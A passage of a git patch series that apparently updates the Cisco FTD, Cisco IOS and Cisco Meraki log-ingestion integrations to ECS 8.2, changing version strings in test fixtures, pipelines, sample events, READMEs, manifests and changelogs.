a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json index 6b7b183665f..97b3aa17e73 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json @@ -43,7 +43,7 @@ }, "@timestamp": "2019-08-15T16:03:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -158,7 +158,7 @@ }, "@timestamp": "2019-08-15T16:05:33.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -298,7 +298,7 @@ }, "@timestamp": "2019-08-15T16:05:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -436,7 +436,7 @@ }, "@timestamp": "2019-08-15T16:07:00.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -571,7 +571,7 @@ }, "@timestamp": "2019-08-15T16:07:18.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -708,7 +708,7 @@ }, "@timestamp": "2019-08-15T16:07:19.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -853,7 +853,7 @@ }, "@timestamp": "2019-08-16T09:33:15.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -987,7 +987,7 @@ }, "@timestamp": "2019-08-16T09:33:15.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1117,7 +1117,7 @@ }, "@timestamp": "2019-08-16T09:35:15.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1243,7 +1243,7 @@ }, "@timestamp": "2019-08-14T15:09:41.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json index ad7484d2202..4a954480a68 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json @@ -42,7 +42,7 @@ }, "@timestamp": "2019-08-14T14:54:25.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -144,7 +144,7 @@ }, "@timestamp": "2019-08-14T14:55:02.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -246,7 +246,7 @@ }, "@timestamp": "2019-08-14T15:00:29.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -348,7 +348,7 @@ }, "@timestamp": "2019-08-14T15:01:41.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -454,7 +454,7 @@ }, "@timestamp": "2019-08-14T15:03:28.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -567,7 +567,7 @@ }, "@timestamp": "2019-08-14T15:03:33.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -680,7 +680,7 @@ }, "@timestamp": "2019-08-14T15:09:43.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -808,7 +808,7 @@ }, "@timestamp": "2019-08-16T09:39:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -922,7 +922,7 @@ }, "@timestamp": "2019-08-16T09:40:45.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1048,7 +1048,7 @@ }, "@timestamp": "2019-08-16T09:42:07.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json index ee870407ad8..801d4ecc4c6 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json @@ -82,7 +82,7 @@ }, "@timestamp": "2020-03-01T01:02:36.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a6cab24b85f..bc3fb0f7578 100644 --- a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -10,7 +10,7 @@ processors: ignore_missing: true - set: field: ecs.version - value: "8.0.0" + value: "8.2.0" # # Parse the syslog header # diff --git a/packages/cisco_ftd/data_stream/log/sample_event.json b/packages/cisco_ftd/data_stream/log/sample_event.json index f54ade25aff..c68aedd324d 100644 --- a/packages/cisco_ftd/data_stream/log/sample_event.json +++ b/packages/cisco_ftd/data_stream/log/sample_event.json @@ -60,7 +60,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_ftd/docs/README.md b/packages/cisco_ftd/docs/README.md index 9f577061401..15c0a1d6c39 100644 --- a/packages/cisco_ftd/docs/README.md +++ b/packages/cisco_ftd/docs/README.md @@ -76,7 +76,7 @@ An example event for `log` looks as following: "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_ftd/manifest.yml b/packages/cisco_ftd/manifest.yml index 061eb60b8d0..e0c565e2f15 100644 --- a/packages/cisco_ftd/manifest.yml +++ b/packages/cisco_ftd/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ftd title: Cisco FTD -version: 2.0.0 +version: 2.1.0 license: basic description: Collect logs from Cisco FTD with Elastic Agent. type: integration From 5f38202633cfe20bf3a7de7c6535c5b0183f9945 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Wed, 23 Feb 2022 11:43:19 -0600 Subject: [PATCH 13/23] Update cisco_ios to ECS 8.2 --- packages/cisco_ios/_dev/build/build.yml | 2 +- packages/cisco_ios/changelog.yml | 5 +++ .../pipeline/test-cisco-ios.log-expected.json | 38 +++++++++---------- ...est-date-format-tzoffset.log-expected.json | 4 +- .../test-date-format.log-expected.json | 36 +++++++++--------- .../pipeline/test-syslog.log-expected.json | 8 ++-- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/log/sample_event.json | 2 +- packages/cisco_ios/docs/README.md | 2 +- packages/cisco_ios/manifest.yml | 2 +- 10 files changed, 53 insertions(+), 48 deletions(-) diff --git a/packages/cisco_ios/_dev/build/build.yml b/packages/cisco_ios/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_ios/_dev/build/build.yml +++ b/packages/cisco_ios/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml index 9c5cd48092b..d681432540a 100644 --- a/packages/cisco_ios/changelog.yml +++ b/packages/cisco_ios/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.5.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.4.1" changes: - description: Add missing event.original mapping diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json index 8986c1b423d..2182e1e68fd 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -13,7 +13,7 @@ "ip": "224.0.0.22" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -66,7 +66,7 @@ "ip": "224.0.0.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -122,7 +122,7 @@ "ip": "255.255.255.255" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -184,7 +184,7 @@ "port": 22 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "allow", @@ -247,7 +247,7 @@ "port": 15600 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -301,7 +301,7 @@ "ip": "192.168.100.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -359,7 +359,7 @@ "port": 15600 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -408,7 +408,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -444,7 +444,7 @@ "port": 15600 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -511,7 +511,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -560,7 +560,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -595,7 +595,7 @@ "ip": "192.168.100.1" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -665,7 +665,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -718,7 +718,7 @@ "port": 22 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -771,7 +771,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -830,7 +830,7 @@ "ip": "10.3.66.3" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "multicast-join", @@ -890,7 +890,7 @@ "ip": "10.3.66.3" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "multicast-join", @@ -936,7 +936,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -966,7 +966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format-tzoffset.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format-tzoffset.log-expected.json index acc9c56efd9..eb96b9d18b6 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format-tzoffset.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format-tzoffset.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -39,7 +39,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json index 1d815882f8f..77812b4f68b 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -39,7 +39,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -70,7 +70,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -101,7 +101,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -132,7 +132,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -163,7 +163,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -194,7 +194,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -225,7 +225,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -256,7 +256,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -287,7 +287,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -318,7 +318,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -349,7 +349,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -380,7 +380,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -411,7 +411,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -442,7 +442,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -473,7 +473,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -504,7 +504,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -535,7 +535,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json index 4cc8b693e4a..fc5d62f57cd 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -38,7 +38,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -72,7 +72,7 @@ "ip": "10.100.8.34" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -123,7 +123,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml index d924289d5b4..f22c5037ac6 100644 --- a/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -4,7 +4,7 @@ description: Pipeline for Cisco IOS logs. processors: - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - set: field: event.category value: network diff --git a/packages/cisco_ios/data_stream/log/sample_event.json b/packages/cisco_ios/data_stream/log/sample_event.json index 2cfc1f7387f..4278f6958d6 100644 --- a/packages/cisco_ios/data_stream/log/sample_event.json +++ b/packages/cisco_ios/data_stream/log/sample_event.json @@ -23,7 +23,7 @@ "ip": "224.0.0.22" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "18c952cc-80e4-43a5-afa9-79993d53ebf6", diff --git a/packages/cisco_ios/docs/README.md b/packages/cisco_ios/docs/README.md index 83e46f90b33..8d61d905996 100644 --- a/packages/cisco_ios/docs/README.md +++ b/packages/cisco_ios/docs/README.md @@ -35,7 +35,7 @@ An example event for `log` looks as following: "ip": "224.0.0.22" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "18c952cc-80e4-43a5-afa9-79993d53ebf6", diff --git a/packages/cisco_ios/manifest.yml b/packages/cisco_ios/manifest.yml index b008474f693..29446657265 100644 --- a/packages/cisco_ios/manifest.yml +++ b/packages/cisco_ios/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ios title: Cisco IOS -version: 1.4.1 +version: 1.5.0 license: basic description: Collect logs from Cisco IOS with Elastic Agent. type: integration From 3761a98ef5e4f4d7b7448eb06c84f1190fdf4691 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Wed, 23 Feb 2022 11:49:44 -0600 Subject: [PATCH 14/23] Update cisco_meraki to ECS 8.2 --- packages/cisco_meraki/_dev/build/build.yml | 2 +- packages/cisco_meraki/changelog.yml | 5 + .../pipeline/test-generated.log-expected.json | 200 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/log/sample_event.json | 2 +- packages/cisco_meraki/docs/README.md | 2 +- packages/cisco_meraki/manifest.yml | 2 +- 7 files changed, 110 insertions(+), 105 deletions(-) diff --git a/packages/cisco_meraki/_dev/build/build.yml b/packages/cisco_meraki/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_meraki/_dev/build/build.yml +++ b/packages/cisco_meraki/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_meraki/changelog.yml b/packages/cisco_meraki/changelog.yml index aa9069cea34..8460acf2706 100644 --- a/packages/cisco_meraki/changelog.yml +++ b/packages/cisco_meraki/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.5.0" + changes: + - description: Update to ECS 8.2.0 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.4.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index 521eb1b1ba5..213f16f19ce 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402787257Z" @@ -14,7 +14,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402790126Z" @@ -26,7 +26,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402791078Z" @@ -38,7 +38,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402791945Z" @@ -50,7 +50,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402792809Z" @@ -62,7 +62,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402793701Z" @@ -74,7 +74,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402797371Z" @@ -86,7 +86,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402798420Z" @@ -98,7 +98,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402799284Z" @@ -110,7 +110,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402800146Z" @@ -122,7 +122,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402801009Z" @@ -134,7 +134,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402802103Z" @@ -146,7 +146,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402802989Z" @@ -158,7 +158,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402803848Z" @@ -170,7 +170,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402804715Z" @@ -182,7 +182,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402805575Z" @@ -194,7 +194,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402806636Z" @@ -206,7 +206,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402807497Z" @@ -218,7 +218,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402808365Z" @@ -230,7 +230,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402809273Z" @@ -242,7 +242,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402810162Z" @@ -254,7 +254,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402811026Z" @@ -266,7 +266,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402811950Z" @@ -278,7 +278,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402812929Z" @@ -290,7 +290,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402813796Z" @@ -302,7 +302,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402814698Z" @@ -314,7 +314,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402815606Z" @@ -326,7 +326,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402816477Z" @@ -338,7 +338,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402817329Z" @@ -350,7 +350,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402818188Z" @@ -362,7 +362,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402819089Z" @@ -374,7 +374,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402819955Z" @@ -386,7 +386,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402820928Z" @@ -398,7 +398,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402821803Z" @@ -410,7 +410,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402822774Z" @@ -422,7 +422,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402823636Z" @@ -434,7 +434,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402824495Z" @@ -446,7 +446,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402859624Z" @@ -458,7 +458,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402860969Z" @@ -470,7 +470,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402861866Z" @@ -482,7 +482,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402862738Z" @@ -494,7 +494,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402863582Z" @@ -506,7 +506,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402864441Z" @@ -518,7 +518,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402865373Z" @@ -530,7 +530,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402866225Z" @@ -542,7 +542,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402867073Z" @@ -554,7 +554,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402867921Z" @@ -566,7 +566,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402868775Z" @@ -578,7 +578,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402869648Z" @@ -590,7 +590,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402870491Z" @@ -602,7 +602,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402871577Z" @@ -614,7 +614,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402872431Z" @@ -626,7 +626,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402873284Z" @@ -638,7 +638,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402874155Z" @@ -650,7 +650,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402875353Z" @@ -662,7 +662,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402876192Z" @@ -674,7 +674,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402877035Z" @@ -686,7 +686,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402877879Z" @@ -698,7 +698,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402878756Z" @@ -710,7 +710,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402879608Z" @@ -722,7 +722,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402880460Z" @@ -734,7 +734,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402881305Z" @@ -746,7 +746,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402882160Z" @@ -758,7 +758,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402883012Z" @@ -770,7 +770,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402883878Z" @@ -782,7 +782,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402884730Z" @@ -794,7 +794,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402885579Z" @@ -806,7 +806,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402886438Z" @@ -818,7 +818,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402887291Z" @@ -830,7 +830,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402888137Z" @@ -842,7 +842,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402888988Z" @@ -854,7 +854,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402889888Z" @@ -866,7 +866,7 